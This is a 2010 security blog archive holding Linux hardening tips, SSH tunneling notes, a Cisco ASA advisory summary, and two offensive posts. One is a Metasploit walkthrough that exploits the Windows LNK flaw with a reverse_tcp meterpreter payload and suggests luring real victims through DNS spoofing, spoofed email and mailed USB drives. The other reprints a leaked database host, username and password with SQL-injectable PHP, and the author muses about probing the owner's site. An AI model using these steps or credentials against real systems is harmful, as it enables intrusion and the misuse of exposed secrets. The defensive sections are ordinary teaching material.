Aug 24 2010

Linux Basix Eps017 Tech Segment

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

A security issue affects the following Ubuntu releases:

  • Ubuntu 9.04
  • Ubuntu 9.10
  • Ubuntu 10.04 LTS

Brief details:

It was discovered that the PC/SC service did not correctly handle malformed messages. A local attacker could exploit this to execute arbitrary code with root privileges. In short, update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

  • Ubuntu 9.10
  • Ubuntu 10.04 LTS

Brief details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications or a malicious archive mirror server could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.

Segment Title: SSH tunneling for good or evil!

What is SSH?

Secure Shell (SSH) is a network protocol that allows data to be exchanged over a secure channel between two networked devices.

How to install/set up SSH?

First be sure to install the most recent version; as of yesterday, OpenSSH 5.6 is the most recent version.

sudo apt-get install ssh (or configure and build from source)

  • Then do a quick test by trying to SSH into your own machine: ssh localhost
  • Then of course you can always edit the /etc/ssh/sshd_config file and do things like force protocol version 2, deny root login, and so on.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate, network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network.

Various types of tunneling protocols:

  • HTTP
  • ICMP
  • DNS
  • SSH

    SSH tunneling, how it works: a nice YouTube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

    When can you use this?

    • For good –> You can use this to create a SOCKS5 proxy to securely tunnel your web traffic, for instance if you are at a free Wi-Fi hot spot.
    • Or if you want to bypass some content filtering that’s in place to block you from accessing certain websites.
    • Securely tunnel your IM chat or email, which you know by default are both clear-text protocols.

    Examples:

    Tunneling Gtalk traffic –> ssh -f [email protected] -L 3000:talk.google.com:5222 home -N

    Tunneling email –> ssh -f [email protected] -L 2000:personal-server.com:25 -N

    • For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/, “reverse SSH tunneling”: as you would expect, if tunneling is getting past a firewall in a forward direction, reverse tunneling is getting access to the inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and remediate.
      • In short, a vendor of ours had a Linux-based appliance on the inside of our network on which they had a pre-configured “stealthy reverse tunnel” that would give them access to that system at any time without our assistance.
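A reverse tunnel like the one described above leaves no listening socket on the inside host; seen from the appliance, it is just an ordinary outbound ssh client session, often to a port other than 22. As an added example (not part of the original post), the following Python parses constructed `ss -Htnp state established` output from a hypothetical appliance and flags every established connection whose local process is the ssh client, which is the trace a defender can actually look for. The addresses, PIDs and process names are made up.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ss -Htnp state established` output from a hypothetical
# Linux appliance at 10.0.5.20 (not real data). Columns are Recv-Q, Send-Q,
# Local Address:Port, Peer Address:Port, Process.
SAMPLE_SS_OUTPUT = """\
0 0 10.0.5.20:51234 203.0.113.10:22 users:(("ssh",pid=1432,fd=3))
0 0 10.0.5.20:22 10.0.1.15:40210 users:(("sshd",pid=877,fd=4))
0 0 10.0.5.20:34522 10.0.9.3:443 users:(("curl",pid=2001,fd=5))
0 0 10.0.5.20:38876 198.51.100.7:443 users:(("ssh",pid=1500,fd=3))
"""

LINE_RE = re.compile(
    r'^\s*\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


@dataclass
class OutboundSsh:
    local: str
    peer: str
    pid: int


def find_outbound_ssh(ss_output, allowed_peers=frozenset()):
    """Return established connections whose *local* process is the ssh client.

    A reverse tunnel (ssh -R) creates its listener on the far end, not on the
    inside host, so the only local evidence is an outbound ssh session. We
    therefore match on the process name rather than on the peer port: a
    client talking to a remote sshd on 443 is just as interesting as one on 22.
    """
    hits = []
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("proc") != "ssh":
            continue  # inbound sshd sessions and other clients are not of interest here
        peer_host = m.group("peer").rsplit(":", 1)[0]
        if peer_host in allowed_peers:
            continue  # e.g. a jump host the appliance is actually supposed to reach
        hits.append(OutboundSsh(m.group("local"), m.group("peer"), int(m.group("pid"))))
    return hits


if __name__ == "__main__":
    for hit in find_outbound_ssh(SAMPLE_SS_OUTPUT):
        print(f"outbound ssh client pid={hit.pid} {hit.local} -> {hit.peer}")
```

On a real box you would feed it the live output of `ss -Htnp state established` (or a periodic capture) and alert on any hit from a host that has no business initiating SSH; the `allowed_peers` set is where you whitelist your own jump hosts.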

    Reference Links

    https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell
    https://calomel.org/firefox_ssh_proxy.html
    https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
    http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/
    http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html

    Aug 04 2010

    Multiple Vulnerabilities in Cisco ASA 5500 Series “Public Release 2010 August 04”

    I received notification of the vulnerabilities outlined below via the Full-Disclosure mailing list, but you can find a direct link to it here –> Link. I figured it was worth mentioning again since most organizations depend on their firewall as the primary means of protection against the many threats on the internet.

    The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

    Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

    SunRPC Inspection Denial of Service Vulnerabilities

    The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

    Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

    These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

    Transport Layer Security (TLS) Denial of Service Vulnerabilities

    TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

    Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

    These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

    Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability

    SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

    A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

    Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

    This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

    Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability

    IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

    During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

    Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

    This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

    As a side note I would like to add that unless you are already running version 8.3 you should disable the vulnerable services and take a moment to read the release notes for version 8.3.

    There are some syntax changes you have to adjust to, as well as a full rule-set conversion. Below is an example of an old rule and its recommended migrated counterpart. Not all of the migrated rules are new, since they were supported in older IOS versions; however, it is now mandatory to do them the proper/recommended way instead of the older way.

    Old Configuration

    static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

    access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

    access-list 1 extended permit udp any host 172.23.57.170 eq 5080

    access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

    access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

    access-group 1 in interface outside

    Migrated Configuration

    static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

    access-list 1 extended permit tcp any host 10.50.50.50 eq 80

    access-list 1 extended permit udp any host 172.23.57.170 eq 5080

    access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

    access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

    access-group 1 in interface outside

    Jul 29 2010

    Linux Basix Security Tips Part 1

    A while back I hinted to the wonderful guys over at http://www.linuxbasix.com/ that I would like to appear on the show and do a segment on Linux security; they agreed, and below are some of the notes that can be used to follow along with my segment.

    Disclaimer: I am by no means a Linux security expert; I am just trying to bring some visibility to a topic that I believe all new users should think about.

    Taken from the Linux basix website, our goal here is to bring together information that will make your introduction to Linux and Open Source Software more enjoyable and productive. As we go along we will be constantly updating this site with our shows and show notes. If you have any questions please post comments to the shows and blog. Feel free to let us know what you think of the show and we will do our best to make it make as much sense as possible. Once the forum is up and running it will be a source to find answers, tips and tricks to make computing more enjoyable.

    The goal of my segment is not to touch on anything too advanced; for that you can find several Linux hardening guides by CERT, NSA, and many more resources out there. Instead I will be focusing on giving a few tips that anyone new to Linux should keep in mind before connecting their server/workstation to the internet.

    I would like to start by sharing a few sentences I found in a blog posting over at Computerworld:

    “You see Windows was designed as a single-user, non-networked operating system. That design is still at the heart of Windows, which is why security must always be an add-on to Windows. Linux, in contrast, was built from the ground up as a multi-user, networked system. Linux, like Unix, which came before it, was constructed to work in a world with hostile users.”

    Physical Security (might seem silly, but this should always be considered)

    Configure the BIOS to disable booting from CDs/DVDs and external devices, and set a password to protect these settings; you can also go another step and encrypt your entire drive. Next, set a password for the GRUB bootloader.

    • Generate a password hash using the command /usr/sbin/grub-md5-crypt.
    • Add the hash to the first line of /boot/grub/menu.lst as follows: password --md5 passwordhash

    Minimal install

    Take a moment to think about your installation. I understand you might not know exactly what you want, but don’t install everything at first. Just do the basics and as you learn more you can then install those additional applications and do it properly. Also remove unnecessary packages, only keep the ones you need, and lastly remove any accounts that are not needed.

    # yum list installed
    # yum list packageName
    # yum remove packageName

    OR

    # dpkg --list
    # dpkg -s packageName
    # apt-get remove packageName

    Stay away from clear-text protocols

    Under no circumstances do you want to use any clear-text protocol. Any of the following protocols or programs (telnet, rsh, rlogin, FTP, TFTP) can give out your username/password to anyone on your local network with a packet sniffer. If you are hosting a website or providing users with a login portal, ensure that you are not using HTTP but HTTPS, even if you have to generate your own certificate.

    Identify all open ports and services

    It’s important to know what ports you have open and what services are associated with them; this way you can decide if you would like to block or filter them with a firewall. This is also important so that in the event you notice a new port open you already have a baseline to compare it to.

    To do this you can use a tool like Nmap (“Network Mapper”), a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

    e.g. nmap -A -sV 127.0.0.1

    You can also use the following for identifying and turning off unwanted services:

    To view all services that are turned on:
    # chkconfig --list | grep '3:on'

    To disable a service:

    # service serviceName stop
    # chkconfig serviceName off

    Security software

    • Install antivirus software. I am aware that Linux is not highly prone to viruses like your average Windows PC, but don’t for a moment think that Linux is not being successfully exploited in the wild every day. You want to ensure that you are not the “low-hanging fruit”; in short, don’t be the easy target.
    • Install/configure a firewall (iptables) and a mandatory access control system (SELinux or AppArmor), and take a moment to read how to configure them.

    Keep Your Software Up to Date

    • Configure your system to update via your software repository and apply them automatically. Security updates should be applied as soon as possible.
    • Create the file apt.cron, make it executable, place it in /etc/cron.daily or /etc/cron.weekly, and ensure that it reads as follows:

    #!/bin/sh
    /usr/bin/apt-get update
    # or, to also install the upgrades: aptitude -s safe-upgrade
    # (note: -s only simulates the upgrade; drop it to actually apply)

    Password policy

    • You want to ensure that you have a proper password policy; first identify any user accounts that have an empty password and set one or remove the account.
    • Set up password aging; it’s important to keep rotating your password at a minimum every 60 days.
    • Set up some sort of password lockout policy; if someone attempts a brute-force attack you need to at least slow them down. A standard practice is to lock out an account after 3 failed login attempts.

      To get password expiration information, enter:
      chage -l userName

      To see failed login attempts, enter:
      faillog

      To unlock an account after login failures, run:
      faillog -r -u userName

      Note you can use the passwd command to lock and unlock accounts:
      # lock account
      passwd -l userName

      # unlock account
      passwd -u userName

      To identify empty passwords, type the following command:
      # awk -F: '($2 == "") {print}' /etc/shadow

    Make Sure No Non-Root Accounts Have UID Set To 0

    Only the root account should have UID 0, which gives full permissions to access the system. Type the following command to display all accounts with UID set to 0:

    # awk -F: '($3 == "0") {print}' /etc/passwd

    You should only see one line, as follows:
    root:x:0:0:root:/root:/bin/bash

    If you see other lines, delete them or make sure the other accounts are authorized by you to use UID 0.
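Added example, not from the original post: a Python version of the two awk checks (empty password field in /etc/shadow, UID 0 in /etc/passwd) together with the lock and ageing rules from the password policy section, run over constructed /etc/passwd and /etc/shadow excerpts (account names and hashes are made up). It goes a little beyond the one-liners: it distinguishes an account locked with `passwd -l` (hash prefixed with `!`) from one that never had a password, and flags accounts whose maximum password age exceeds the 60-day rotation the post recommends.

```python
# Constructed /etc/passwd and /etc/shadow excerpts (not taken from a real system).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$constructed$notarealhash:14800:0:99999:7:::
daemon:*:14800:0:99999:7:::
toor:$6$constructed$notarealhash:14800:0:99999:7:::
alice::14800:0:99999:7:::
bob:!$6$constructed$notarealhash:14800:0:60:7:::
"""

MAX_PASSWORD_AGE_DAYS = 60  # the rotation interval the post recommends


def uid0_accounts(passwd_text):
    """Same test as: awk -F: '($3 == "0") {print}' /etc/passwd"""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0":
            names.append(fields[0])
    return names


def password_state(field):
    """Classify the password field (second column) of a shadow entry."""
    if field == "":
        return "empty"      # the awk '($2 == "")' case: login with no password at all
    if field in ("*", "!!"):
        return "nologin"    # no usable password was ever set
    if field.startswith("!"):
        return "locked"     # passwd -l prefixes the existing hash with '!'
    return "hashed"


def audit_accounts(passwd_text, shadow_text):
    """Run the post's account checks over both files in one pass."""
    shadow = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 5:
            shadow[fields[0]] = fields
    state = {user: password_state(f[1]) for user, f in shadow.items()}
    return {
        "extra_uid0": [u for u in uid0_accounts(passwd_text) if u != "root"],
        "empty_password": [u for u, s in state.items() if s == "empty"],
        "locked": [u for u, s in state.items() if s == "locked"],
        # 5th shadow field is the maximum age in days; only accounts that can
        # still log in with a password are worth reporting here
        "max_age_over_policy": [
            u for u, f in shadow.items()
            if state[u] == "hashed" and f[4].isdigit() and int(f[4]) > MAX_PASSWORD_AGE_DAYS
        ],
    }


if __name__ == "__main__":
    for check, users in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{check}: {users}")
```

To run it against a real system, read the two files (the shadow file needs root) and pass their contents in place of the samples.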

    File and file system security

    SUID and SGID files on your system are a potential security risk, and should be monitored closely. Because these programs grant special privileges to the user who is executing them, it is necessary to ensure that insecure programs are not installed. A favorite trick of crackers is to exploit SUID-root programs, then leave a SUID program as a back door to get in the next time, even if the original hole is plugged.

    • Find all SUID/SGID programs on your system, and keep track of what they are, so you are aware of any changes which could indicate a potential intruder. Use the following command to find all SUID/SGID programs on your system:

    root# find / -type f \( -perm -04000 -o -perm -02000 \)

    World-writable files, particularly system files, can be a security hole if a cracker gains access to your system and modifies them. Additionally, world-writable directories are dangerous, since they allow a cracker to add or delete files as he wishes (for example, to upload malware to a site and infect visitors).

    To locate all world-writable directories (without the sticky bit) on your system, use the following command:

    find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

    Secure ssh remote access

    • Disable root login via ssh. If someone is going to try and brute-force your ssh server, the first user name they will try will be root, so ensure that you do not allow ssh login for your root user. You can verify or edit this by changing the config file:

    vi /etc/ssh/sshd_config

    Find this section in the file, containing the line with “PermitRootLogin” in it.

    #LoginGraceTime 2m
    #PermitRootLogin no
    #StrictModes yes
    #MaxAuthTries 6

    Then restart your SSH service with sudo /etc/init.d/sshd restart
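Note that in the excerpt above the PermitRootLogin line starts with #, so it is a comment and not in effect; sshd also honours only the first occurrence of a keyword, so a later duplicate does nothing. Added example, not part of the original post: a small Python checker for the two sshd_config settings this page asks for (protocol version 2 only, and no root login; see also the "edit sshd_config" bullet in the SSH tunneling segment), run over a constructed config excerpt that mirrors the one above. Match blocks are not modelled, and on modern OpenSSH the Protocol keyword is a no-op because only version 2 exists.

```python
import re

# Constructed sshd_config excerpt mirroring the section quoted in the post.
# Every hardening line here is commented out, so none of them is in effect.
SAMPLE_SSHD_CONFIG = """\
Port 22
Protocol 2,1
#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
"""

# Keyword -> value the post asks for (keywords are compared case-insensitively).
EXPECTED = {
    "protocol": "2",          # force SSH protocol version 2 only
    "permitrootlogin": "no",  # deny root login over ssh
}


def parse_sshd_config(text):
    """Return the effective keyword -> value map for a sshd_config body.

    sshd takes the *first* occurrence of a keyword and ignores later ones, and
    a line starting with '#' is a comment, not a setting. Match blocks are not
    modelled here: every directive is treated as global.
    """
    effective = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"([A-Za-z0-9]+)\s*[ =]\s*(.+)$", line)  # "Key value" or "Key=value"
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        effective.setdefault(key, value)  # first occurrence wins
    return effective


def audit_sshd_config(text, expected=EXPECTED):
    """Map each expected keyword to (effective value or None, passes?)."""
    effective = parse_sshd_config(text)
    report = {}
    for key, want in expected.items():
        got = effective.get(key)
        report[key] = (got, got is not None and got.lower() == want)
    return report


if __name__ == "__main__":
    for key, (got, ok) in audit_sshd_config(SAMPLE_SSHD_CONFIG).items():
        print(f"{key}: effective={got!r} {'OK' if ok else 'FAIL'}")
```

Run against the real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; a `None` result means the keyword is only present as a comment and the compiled-in default applies.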

    No-owner files

    Files not owned by any user or group can pose a security problem. Find them with the following command, which lists files that do not belong to a valid user and a valid group:

    find /dir -xdev \( -nouser -o -nogroup \) -print
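Added example, not part of the original post: a Python equivalent of the three find commands in this section (SUID/SGID files, world-writable directories without the sticky bit, and files with no valid owner or group) that walks a tree once, stays on one filesystem like find's -xdev, and never follows symlinks. As a generalization it also lists world-writable regular files, which the directory-only command above does not. The demo() function builds a throwaway directory with constructed files so it can be run without touching the real system; ownership is checked against the local passwd and group databases.

```python
import grp
import os
import pwd
import shutil
import stat
import tempfile


def _uid_exists(uid):
    try:
        pwd.getpwuid(uid)
        return True
    except KeyError:
        return False


def _gid_exists(gid):
    try:
        grp.getgrgid(gid)
        return True
    except KeyError:
        return False


def _dev_of(path):
    try:
        return os.lstat(path).st_dev
    except OSError:
        return None


def find_risky_files(root, uid_exists=_uid_exists, gid_exists=_gid_exists):
    """Walk `root` on a single filesystem (find's -xdev) and return, relative to
    `root`, what the post's find commands would list, plus world-writable files."""
    report = {"suid_sgid": [], "world_writable_files": [],
              "world_writable_dirs": [], "no_owner": []}
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune directories on other filesystems (mount points), like -xdev.
        dirnames[:] = [d for d in dirnames
                       if _dev_of(os.path.join(dirpath, d)) == root_dev]
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink is judged by itself, never followed
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            mode = st.st_mode
            if not uid_exists(st.st_uid) or not gid_exists(st.st_gid):
                report["no_owner"].append(rel)            # find -nouser -o -nogroup
            if stat.S_ISDIR(mode):
                # world-writable without the sticky bit: anyone may delete or replace entries
                if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                    report["world_writable_dirs"].append(rel)
            elif stat.S_ISREG(mode):
                if mode & (stat.S_ISUID | stat.S_ISGID):
                    report["suid_sgid"].append(rel)       # find -perm -04000 -o -perm -02000
                if mode & stat.S_IWOTH:
                    report["world_writable_files"].append(rel)
    return {k: sorted(v) for k, v in report.items()}


def demo():
    """Build a throwaway tree with one instance of each problem (constructed
    test data), scan it, and remove it again."""
    base = tempfile.mkdtemp(prefix="riskyfiles-")
    try:
        for d in ("bin", "tmp", "shared"):
            os.mkdir(os.path.join(base, d))
        for rel, mode in [("bin/suid_tool", 0o4755), ("bin/sgid_tool", 0o2755),
                          ("bin/safe_tool", 0o755), ("shared/notes.txt", 0o666)]:
            with open(os.path.join(base, rel), "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(os.path.join(base, rel), mode)
        os.chmod(os.path.join(base, "tmp"), 0o1777)    # sticky bit set: acceptable
        os.chmod(os.path.join(base, "shared"), 0o777)  # no sticky bit: flagged
        return find_risky_files(base)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Against a live system call `find_risky_files("/")` as root and diff the result against a saved baseline; a new SUID binary showing up between runs is exactly the change the post tells you to watch for.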

    Keeping an eye on your logs:

    You should configure logging and auditing so you can keep an eye on any type of attack that is launched against your system. You can manually check the following logs or use a tool like logwatch or logcheck or any number of log parsers out there. Logs of interest are:

    • /var/log/syslog
    • /var/log/faillog
    • /var/log/auth
    • /var/log/lastlog
    • /var/log/messages
    • /var/log/apache2/access.log and error.log

    When all else fails, here are some useful scripts and tools you can use:

    Lynis: Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

    sectool (Security Audit Tool) is a security tool that can be used both for a security audit and as part of an intrusion detection system. It consists of a set of tests, a library and textual/graphical front-ends. Tests are sorted into groups and security levels. Administrators can run selected tests, groups or whole security levels.

    The Bastille Hardening program “locks down” an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system’s current state of hardening, granularly reporting on each of the security settings with which it works.

    audit2.pl (perl): This second script searches the entire file system, listing SUID, SGID, world-writable and group-writable files. It also lists trust files and their contents. Finally it lists files with weird names (e.g., containing punctuation characters), which might be dangerous or a sign of penetration. On a large server with 100GB disks, this can take a few hours to run.

    Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfiguration that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

    DenyHosts is a script intended to be run by Linux system administrators to help thwart SSH server attacks (also known as dictionary based attacks and brute force attacks).

    OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

    References:

    http://iase.disa.mil/stigs/checklist/index.html

    http://www.sans.org/score/checklists/linuxchecklist.pdf

    http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

    http://georgia.ubuntuforums.org/showthread.php?t=1002167&page=2

    http://boilinglinux.blogspot.com/2008/07/ubuntu-hardy-hardening.html

    http://www.cyberciti.biz/tips/linux-security.html

    http://www.debian.org/doc/manuals/securing-debian-howto/

    http://tldp.org/HOWTO/Security-HOWTO/file-security.html

    http://blogs.computerworld.com/16367/dell_back_tracks_on_linux_being_safer_than_windows

    http://www.rootkit.nl/projects/lynis.html

    https://fedorahosted.org/sectool/

    http://www.security-database.com/toolswatch/

    http://securitytube.net/Mastering-IPTables-video.aspx

    http://nmap.org/

    http://www.openvas.org/

    http://www.bastille-unix.org/

    http://denyhosts.sourceforge.net/

    http://pentestmonkey.net/tools/unix-privesc-check/

    http://www.boran.ch/audit

    http://oreilly.com/pub/h/66

    http://www.howtogeek.com/howto/linux/security-tip-disable-root-ssh-login-on-linux/

    http://www.cyberciti.biz/faq/linux-log-files-location-and-how-do-i-view-logs-files/

    Jul 22 2010

    Exploiting MS “LNK” Vulnerability

    A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

    Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

    Proof of concept testing:
    This test was performed using my BT4 VM, which was assigned IP address 192.168.126.135, and a Win XP SP3 VM using IP address 192.168.126.134.

    Step 1: Load Metasploit and get latest update

    On my BackTrack 4 VM I browsed to /pentest/exploit/framework3, then loaded msfconsole; once that is loaded, run svn update so you can get the latest and greatest.

    Fig-1 SVN Update

    Step 2: Select your Exploit and Payload

    msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

    The show options command will show you the various parameters that need to be set in order for the exploit to be functional. In our case it’s setting up the listening IP and listening port.

    Fig-2  Choosing Exploit and Payload

    Step 3: Fill-in required options and run exploit

    At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back to, since I selected reverse_tcp.

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

    Fig-3 Fill-in LHOST and SRVHOST

    Step 4: Get your victim to click the link or view the malicious file

    Now at this stage you have to get a bit creative; I can suggest a few things you can try:

    • Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
    • Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
    • ARP spoof your host network and find a given target that’s using Facebook or one of  many social networks and try to send them the link that way.
    • Try a far out social engineering  attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.

    Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

    Fig-4 Successful Exploit

    Verify you have an active session using sessions -l, then connect to that session with sessions -i #; from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XP VM and that it was successfully exploited.

    Fig-5 Running Commands on exploited host

    Fig-6 Popup box on exploited host

    In the end there is really not much the average user, who is not aware of your everyday vulnerability, can do, but we as IT professionals need to be in the loop so that we can take back the information and make them aware. Lastly, the image in figure 6 should be a dead giveaway that something is up with your computer: if you didn’t connect to a share but all of a sudden you see one pop up, it’s time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback is welcome.



    Jul 22 2010

    Being smart about testing your application

    This is just going to be a short write-up on something I figured was worth mentioning. While going through pastebin I found the following entry 3 seconds after it was posted –> http://pastebin.com :

    <?php
    include 'top.php';
    include 'submenuhonorshall.php';

    /*SELECT * FROM TABLE WHERE field =
    */

    $db = 'gnemi_addison';
    mysql_connect("gnemi.php-corner.com", "gnemi_root", "ignurupi87") or die(mysql_error());
    mysql_select_db($db) or die(mysql_error());
    ?>

    <div id="content">
    <h1>Honors Hall Library</h1>
    <form method="post">
    <p class="norm">
    <select name="searchby">
    <option value="Author_First_Name">Author First Name</option>
    <option value="Author_Last_Name" selected="selected">Author Last Name</option>
    <option value="Title">Title</option>
    </select>
    <input type="text" name="query" />
    <input type="submit" value="Submit!" />
    </p>
    </form>

    <?php
    $result = mysql_query("SELECT * FROM `library` WHERE `'" . $_POST['searchby'] . "'` = '" . $_POST['query'] . "' ORDER BY `Title` LIMIT 20");
    while ($row = mysql_fetch_array($result))
    {
    echo $row['Last Name'] . $row['First Name'] . $row['Title'] . $row['inout'];
    }
    ?>

    <?php
    include '../address.php';
    include '../phptemplates/bottomhall.php';
    ?>

    Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

    • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “gnemi.php-corner.com”?
    • What if I ran a whois lookup against that domain what would I find?
    • What if I Google the email addresses associated with that domain?
    • And most importantly, are the username and password referenced still being used currently?
    • Are those tables and DB name real or just test names?
    • Would I find anything interesting if I were to crawl that website?

    Now a simple whois returned a valid email address along with some other useful information:

    And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

